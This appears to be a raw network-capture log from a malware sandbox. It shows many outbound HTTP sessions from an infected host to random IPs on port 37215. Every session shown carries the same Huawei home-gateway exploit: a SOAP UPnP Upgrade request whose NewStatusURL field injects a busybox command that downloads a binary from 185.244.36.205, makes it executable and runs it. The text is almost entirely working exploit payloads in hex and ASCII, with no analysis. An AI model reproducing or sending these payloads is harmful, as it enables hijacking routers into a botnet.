                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              198192.168.2.1536540197.1.30.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038686037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              199192.168.2.1551676138.187.164.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038686991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              200192.168.2.154506894.191.247.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038686991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              201192.168.2.1534894121.85.94.16837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038752079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              202192.168.2.1558302157.136.134.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038758039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              203192.168.2.1555306222.101.195.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038760900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              204192.168.2.153846845.96.224.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038822889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              205192.168.2.154904294.20.55.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038825989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              206192.168.2.1534720197.98.33.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038832903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              207192.168.2.1547706122.164.105.13737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038873911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
